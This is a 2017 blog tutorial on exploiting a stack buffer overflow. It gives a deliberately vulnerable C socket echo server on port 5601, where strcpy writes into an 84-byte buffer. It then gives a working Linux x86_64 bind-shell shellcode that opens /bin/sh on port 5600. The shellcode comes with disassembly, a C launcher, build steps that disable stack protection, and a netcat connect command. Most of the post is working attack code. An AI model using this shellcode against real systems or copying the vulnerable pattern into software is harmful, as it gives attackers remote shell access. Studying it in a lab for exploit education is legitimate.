Our Feeds

Friday, 20 January 2017

Ajith Kp

Buffer Overflow Tutorial: Socket Programs

Buffer Overflow is the vulnerability which make your system high risk. It allows unlimited access to the attacker, and allows inject shellcodes. That is the attacker can execute any malicious codes on target machine. This video tutorial shows how the hackers exploits remote services running in remote systems and how to get access to it. Here I'm using custom socket program, which is a vulnerable to Stack Buffer Overflow. The program is ECHO server, which listens port 5601.

Buffer Overflow Tutorial Linux

Vulnerable Code

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
/*
http://www.terminalcoders.blogspot.com
BOF Tutorial
Video: https://youtu.be/uPfBkU0LqBA
*/
void copy(char str[8000]){ //Vulnerable function
  char cpy[84];
  strcpy(cpy, str); //Vulnerable section
}
void start_server(){
    char str[8000], cpy[64];
    int sfd, cfd;
 
    struct sockaddr_in sock;
 
    sfd = socket(AF_INET, SOCK_STREAM, 0);
 
    bzero(&sock, sizeof(sock));
 
    sock.sin_family = AF_INET;
    sock.sin_addr.s_addr = htons(INADDR_ANY);
    sock.sin_port = htons(5601); //Binding port
 
    bind(sfd, (struct sockaddr *) &sock, sizeof(sock));
 
    listen(sfd, 10);
 
    cfd = accept(sfd, (struct sockaddr*) NULL, NULL);
 
    while(1){
        read(cfd,str,8000);
        copy(str);
        puts(str);
        write(cfd, str, strlen(str)+1);
    }
}
int main(int argc, char **argv){
    start_server();
}

ShellCode

/*
---------------------------------------------------------------------------------------------------

Linux/x86_64 - Bind 5600 TCP Port - shellcode - 87 bytes

Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080: 48 31 c0              xor    %rax,%rax
  400083: 48 31 d2              xor    %rdx,%rdx
  400086: 48 31 f6              xor    %rsi,%rsi
  400089: ff c6                 inc    %esi
  40008b: 6a 29                 pushq  $0x29
  40008d: 58                    pop    %rax
  40008e: 6a 02                 pushq  $0x2
  400090: 5f                    pop    %rdi
  400091: 0f 05                 syscall 
  400093: 48 97                 xchg   %rax,%rdi
  400095: 6a 02                 pushq  $0x2
  400097: 66 c7 44 24 02 15 e0  movw   $0xe015,0x2(%rsp)
  40009e: 54                    push   %rsp
  40009f: 5e                    pop    %rsi
  4000a0: 52                    push   %rdx
  4000a1: 6a 31                 pushq  $0x31
  4000a3: 58                    pop    %rax
  4000a4: 6a 10                 pushq  $0x10
  4000a6: 5a                    pop    %rdx
  4000a7: 0f 05                 syscall 
  4000a9: 5e                    pop    %rsi
  4000aa: 6a 32                 pushq  $0x32
  4000ac: 58                    pop    %rax
  4000ad: 0f 05                 syscall 
  4000af: 6a 2b                 pushq  $0x2b
  4000b1: 58                    pop    %rax
  4000b2: 0f 05                 syscall 
  4000b4: 48 97                 xchg   %rax,%rdi
  4000b6: 6a 03                 pushq  $0x3
  4000b8: 5e                    pop    %rsi
  4000b9: ff ce                 dec    %esi
  4000bb: b0 21                 mov    $0x21,%al
  4000bd: 0f 05                 syscall 
  4000bf: 75 f8                 jne    0x4000b9
  4000c1: f7 e6                 mul    %esi
  4000c3: 52                    push   %rdx
  4000c4: 48 bb 2f 62 69 6e 2f  movabs $0x68732f2f6e69622f,%rbx
  4000cb: 2f 73 68 
  4000ce: 53                    push   %rbx
  4000cf: 48 8d 3c 24           lea    (%rsp),%rdi
  4000d3: b0 3b                 mov    $0x3b,%al
  4000d5: 0f 05                 syscall

---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o bind_shell bind_shell.c
$ execstack -s bind_shell
$ ./bind_shell

How to Connect

$ nc <HOST IP ADDRESS> 5600

Eg:

$ nc 127.0.0.1 5600

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
void main(int argc, char **argv)
{
 int (*func)();
 func = (int (*)()) sh;
 (int)(*func)();
}

Video